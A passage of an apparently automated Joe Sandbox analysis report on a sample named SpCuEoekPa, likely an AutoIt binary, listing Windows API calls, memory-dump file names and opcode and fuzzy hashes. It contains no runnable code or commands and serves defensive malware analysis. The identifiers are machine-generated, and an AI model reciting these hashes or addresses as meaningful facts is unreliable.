                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
                                                            • Instruction ID: 633833ce3c366303f943b26b4b28d27779f17fd286865f0e4855e4f95eb07f53
                                                            • Opcode Fuzzy Hash: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
                                                            • Instruction Fuzzy Hash: F2518938600289DFDF22DF68C988FAEBBE9AF45314F15422DE851EB290D3B49D04CB51
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0036179A
                                                            • GetWindowRect.USER32(?,?), ref: 003617FE
                                                            • ScreenToClient.USER32(?,?), ref: 0036181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0036182C
                                                            • EndPaint.USER32(?,?), ref: 00361876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
                                                            • Instruction ID: f13bf356fc92b306ac1ec25446765a32ebef41057564b61109611ed93340306e
                                                            • Opcode Fuzzy Hash: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
                                                            • Instruction Fuzzy Hash: 7841B2302047409FDB22DF25DCC4FB67BE8FB4A724F188669F5958B2A1C7B09845DB61
                                                            APIs
                                                            • ShowWindow.USER32(004257B0,00000000,01645CF8,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 003EB736
                                                            • ShowWindow.USER32(004257B0,00000000,01645CF8,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB796
                                                            • ShowWindow.USER32(00000000,00000004,?,003EB5A8,?,?), ref: 003EB7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 003EB7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003EB7EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
                                                            • Instruction ID: b1698ae8da1bd7ec1eaa94a5c7bbe782f7ca85e48e75a106cbec804c8f3c9690
                                                            • Opcode Fuzzy Hash: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
                                                            • Instruction Fuzzy Hash: CE417434600190EFDB23CF25C499B96BBE1FF45350F1942B9E9488FAE2C771A856CB51
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,003D4E41,?,?,00000000,00000001), ref: 003D70AC
                                                              • Part of subcall function 003D39A0: GetWindowRect.USER32(?,?), ref: 003D39B3
                                                            • GetDesktopWindow.USER32 ref: 003D70D6
                                                            • GetWindowRect.USER32(00000000), ref: 003D70DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003D710F
                                                              • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                            • GetCursorPos.USER32(?), ref: 003D713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D7199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
                                                            • Instruction ID: c8b6390cb8ae7e0cc9519bc97712139bd10db2aaad616d56205ee07021fe3318
                                                            • Opcode Fuzzy Hash: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
                                                            • Instruction Fuzzy Hash: A531D272509345AFD721DF14D849F9BB7EAFF88314F000A1AF5859B291DB70EA09CB92
                                                            APIs
                                                              • Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
                                                              • Part of subcall function 003B80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
                                                              • Part of subcall function 003B80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
                                                              • Part of subcall function 003B80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
                                                              • Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,003B842F), ref: 003B88CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003B88D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 003B88DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 003B88F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,003B842F), ref: 003B890A
                                                            • HeapFree.KERNEL32(00000000), ref: 003B8911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
                                                            • Instruction ID: c15c16592f19b227645741f9740745fe5dc1f7e9608f5a3861fb1e2a355cef91
                                                            • Opcode Fuzzy Hash: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
                                                            • Instruction Fuzzy Hash: 43119D71601209FFDF229BA4DC49BFE7BACEB45319F108128E945DB550CB729E04DB60
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 003B8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
                                                            • Instruction ID: b2f48b198dd0c577223b71ba2e58231e82b4875b15cb0dcf4cd9add0beddf8f3
                                                            • Opcode Fuzzy Hash: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
                                                            • Instruction Fuzzy Hash: FF113A72501149AFDF12CFA4DD88AEE7BADEF48348F054165FA05A61A0C7718E64EB20
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 003BB7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 003BB7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003BB7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 003BB7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003BB7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 003BB7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
                                                            • Instruction ID: 5a6c3af0f42d9ba041674d840e9cbb2675bf0f48277c5bcfa2c9db7ee0af54fc
                                                            • Opcode Fuzzy Hash: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
                                                            • Instruction Fuzzy Hash: 9C018875E00249FFEB115BA69C85A5EBFBCEF48311F004175FA04AB291DA719D00CF51
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
                                                            • Instruction ID: be299c1bf68662e3222b418616f309ab265967ace5dca6e90feca8e1ff6e2c04
                                                            • Opcode Fuzzy Hash: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
                                                            • Instruction Fuzzy Hash: A7016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003C53F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003C540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 003C541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C5437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
                                                            • Instruction ID: d8f8a611580c1a6375e0c188c4f2ff88865d0be936c4f5ce4c5d10b6ff2b2c85
                                                            • Opcode Fuzzy Hash: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
                                                            • Instruction Fuzzy Hash: 0DF01D32241598BFE7325BA29C4EEAB7B7CEBC6B11F000269FA04D50D197E11A0186B5
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 003C7243
                                                            • EnterCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00370EE4,?,?), ref: 003C7261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00370EE4,?,?), ref: 003C726E
                                                              • Part of subcall function 003C6C35: CloseHandle.KERNEL32(00000000,?,003C727B,?,00370EE4,?,?), ref: 003C6C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C7281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
                                                            • Instruction ID: 8bcc5ef57a53276aa1f82857bede745d1b0fd117c980d016d6526de025309ac2
                                                            • Opcode Fuzzy Hash: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
                                                            • Instruction Fuzzy Hash: D3F03A3A540652AFD7231B64ED8CAEA773DEF45702F110A35F602990E0CBB65901CB50
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003B899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 003B89A9
                                                            • CloseHandle.KERNEL32(?), ref: 003B89B2
                                                            • CloseHandle.KERNEL32(?), ref: 003B89BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 003B89C3
                                                            • HeapFree.KERNEL32(00000000), ref: 003B89CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
                                                            • Instruction ID: 77d57e52c63b2e6ac818ebc984d61c6fe9b62518031c46ac105a4f7155e0cf64
                                                            • Opcode Fuzzy Hash: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
                                                            • Instruction Fuzzy Hash: AEE0C236004049FFDA121FE1EC4C91ABB6DFB89362B108330F219890F0CBB29460DB50
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B76EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,003EFB80,000000FF,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7727
                                                            • _memcmp.LIBCMT ref: 003B7748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,?
                                                            • API String ID: 314563124-1094787077
                                                            • Opcode ID: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
                                                            • Instruction ID: b19f66157f973490f2283245980b17e2bc29bffdf320a842a5670a39c37cccbc
                                                            • Opcode Fuzzy Hash: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
                                                            • Instruction Fuzzy Hash: F6810D75A00109EFCB05DFA4C984EEEB7B9FF89315F214558F606AB250DB71AE06CB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003D8613
                                                            • CharUpperBuffW.USER32(?,?), ref: 003D8722
                                                            • VariantClear.OLEAUT32(?), ref: 003D889A
                                                              • Part of subcall function 003C7562: VariantInit.OLEAUT32(00000000), ref: 003C75A2
                                                              • Part of subcall function 003C7562: VariantCopy.OLEAUT32(00000000,?), ref: 003C75AB
                                                              • Part of subcall function 003C7562: VariantClear.OLEAUT32(00000000), ref: 003C75B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 095752acd5e81fdb74cd9c6edfd0585f174573056d2230a85140f790a3ba7c9f
                                                            • Instruction ID: 7cabd69306067ad946b410b535a6c5f43b05b92d01093dce76a3d7fc82d24174
                                                            • Opcode Fuzzy Hash: 095752acd5e81fdb74cd9c6edfd0585f174573056d2230a85140f790a3ba7c9f
                                                            • Instruction Fuzzy Hash: 88918C72608301DFC711DF24C48495ABBE8EF89714F14896EF98A8B3A1DB31E905CB92
                                                            APIs
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • _memset.LIBCMT ref: 003C2B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003C2C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: d06e8a358b276d0a45628900fc620805523b01ab9cba71c6290a0efa727ba25f
                                                            • Instruction ID: 9598dd7d267c4897114be43969e7689879fcbfd670f36371303676840a2d783c
                                                            • Opcode Fuzzy Hash: d06e8a358b276d0a45628900fc620805523b01ab9cba71c6290a0efa727ba25f
                                                            • Instruction Fuzzy Hash: A251CC712083019ED726AF28D885F6FB7E8AF99310F058A2DF895D61A0DBB0DC048792
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_free
                                                            • String ID: 3c7$_7
                                                            • API String ID: 2620147621-4188345352
                                                            • Opcode ID: aa641195e9695b029835d581087ea4b2bd28a44f0d77fa2182dd91d5344d0b4c
                                                            • Instruction ID: 120a1fd82065047b4ac1910f3bde8ee21addcef0d13b15d950bb7907ae88e133
                                                            • Opcode Fuzzy Hash: aa641195e9695b029835d581087ea4b2bd28a44f0d77fa2182dd91d5344d0b4c
                                                            • Instruction Fuzzy Hash: C3518B716087418FDB3ACF29C581B6BBBE5EF85310F09882DE88987350DB35E905CB82
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: 3c7$ERCP
                                                            • API String ID: 2532777613-2328722621
                                                            • Opcode ID: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
                                                            • Instruction ID: b8a556ff9b804136ef3fc1acb35c8681d0d419b86437d36485ba28d56a58dd1f
                                                            • Opcode Fuzzy Hash: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
